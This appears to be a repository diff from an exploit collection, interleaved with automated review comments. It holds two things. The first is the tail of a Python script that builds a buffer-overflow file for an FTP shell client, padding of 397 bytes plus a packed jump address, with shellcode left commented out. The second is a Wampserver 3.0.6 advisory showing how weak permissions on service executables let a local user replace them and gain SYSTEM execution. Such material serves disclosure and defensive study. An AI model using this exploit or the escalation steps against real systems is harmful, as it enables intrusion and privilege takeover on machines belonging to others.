ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
|
||||
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
|
||||
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
|
||||
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
|
||||
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
|
||||
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
|
||||
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
|
||||
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
|
||||
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
|
||||
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
|
||||
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
|
||||
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
|
||||
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
|
||||
ban+='\n'
|
||||
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
|
||||
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
|
||||
ban+="\x61\x6c\x62\x61\x6c\x61\x77\x69\x34\x70\x65\x6e\x74\x65\x73\x74\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"
|
||||
print ban
|
||||
import struct
|
||||
E = struct.pack("<L",0x00F39658)#JMP to KERNELBA.CloseHandle
|
||||
#397
|
||||
EXp="\x41"*397+E
|
||||
#E2+'\x90'*1+E1+"\x90"*1+E+'\x90'*1+sc
|
||||
|
||||
upfile="Exoploit_ftpshell.csv"
|
||||
file=open(upfile,"w")
|
||||
file.write(EXp)
|
||||
file.close()
|
||||
print 'done:- {}'.format(upfile)
|
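Review bot: Most of the 96 lines are the hex-escaped `ban` string, which is printed and used for nothing else; store the banner as plain text or drop it so the file can be audited by reading it. The header calls this `Crash(PoC)` and the file is filed under `platforms/windows/dos`, yet the code keeps a packed address commented `JMP to KERNELBA.CloseHandle` and a commented-out line ending in `+sc`; remove the leftovers or correct the classification. Minor: the output name `Exoploit_ftpshell.csv` is misspelled and `file` shadows the Python 2 built-in.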
80
platforms/windows/local/40967.txt
Executable file
|
@ -0,0 +1,80 @@
|
|||
=====================================================
|
||||
# Vendor Homepage: http://www.wampserver.com/
|
||||
# Date: 10 Dec 2016
|
||||
# Version : Wampserver 3.0.6 32 bit x86
|
||||
# Tested on: Windows 7 Ultimate SP1 (EN)
|
||||
# Author: Heliand Dema
|
||||
# Contact: heliand@cyber.al
|
||||
=====================================================
|
||||
|
||||
Wampserver installs two services called 'wampapache' and 'wampmysqld'
|
||||
with weak file permission running with SYSTEM privileges.
|
||||
This could potentially allow an authorized but non-privileged local user
|
||||
to execute arbitrary code with elevated privileges on the system.
|
||||
|
||||
C:\>sc qc wampapache
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: wampapache
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 3 DEMAND_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME :
|
||||
"c:\wamp\bin\apache\apache2.4.23\bin\httpd.exe" -k runservice
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : wampapache
|
||||
DEPENDENCIES : Tcpip
|
||||
: Afd
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
|
||||
PS C:\> icacls c:\wamp\bin\apache\apache2.4.23\bin\httpd.exe
|
||||
c:\wamp\bin\apache\apache2.4.23\bin\httpd.exe
|
||||
BUILTIN\Administrators:(I)(F) <--- Full Acces
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
NT AUTHORITY\Authenticated
|
||||
Users:(I)(M) <--- Modify
|
||||
|
||||
|
||||
C:\Windows\system32>sc qc wampmysqld
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: wampmysqld
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 3 DEMAND_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME :
|
||||
c:\wamp\bin\mysql\mysql5.7.14\bin\mysqld.exe wampmysqld
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : wampmysqld
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
PS C:\> icacls c:\wamp\bin\mysql\mysql5.7.14\bin\mysqld.exe
|
||||
c:\wamp\bin\mysql\mysql5.7.14\bin\mysqld.exe
|
||||
BUILTIN\Administrators:(I)(F) <--- Full Acces
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
NT AUTHORITY\Authenticated
|
||||
Users:(I)(M) <--- Modify
|
||||
|
||||
|
||||
Notice the line: NT AUTHORITY\Authenticated Users:(I)(M) which lists the
|
||||
permissions for authenticated however unprivileged users. The (M) stands
|
||||
for Modify, which grants us, as an unprivileged user, the ability to
|
||||
read, write and delete files and subfolders within this folder.
|
||||
|
||||
|
||||
====Proof-of-Concept====
|
||||
|
||||
To properly exploit this vulnerability, the local attacker must insert
|
||||
an executable file called mysqld.exe or httpd.exe and replace the
|
||||
original files. Next time service starts the malicious file will get
|
||||
executed as SYSTEM.
|
||||
|
||||
|
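Review bot: The explanation says `(M)` grants rights over "files and subfolders within this folder", but both `icacls` listings are for the executables themselves, and every entry carries `(I)`, meaning the ACE is inherited from a parent directory. State which directory carries the `Authenticated Users` Modify entry, since that is where it has to be removed, and add a remediation section; the advisory currently ends at the proof of concept. The header block also has no title line, and `Full Acces` is misspelled.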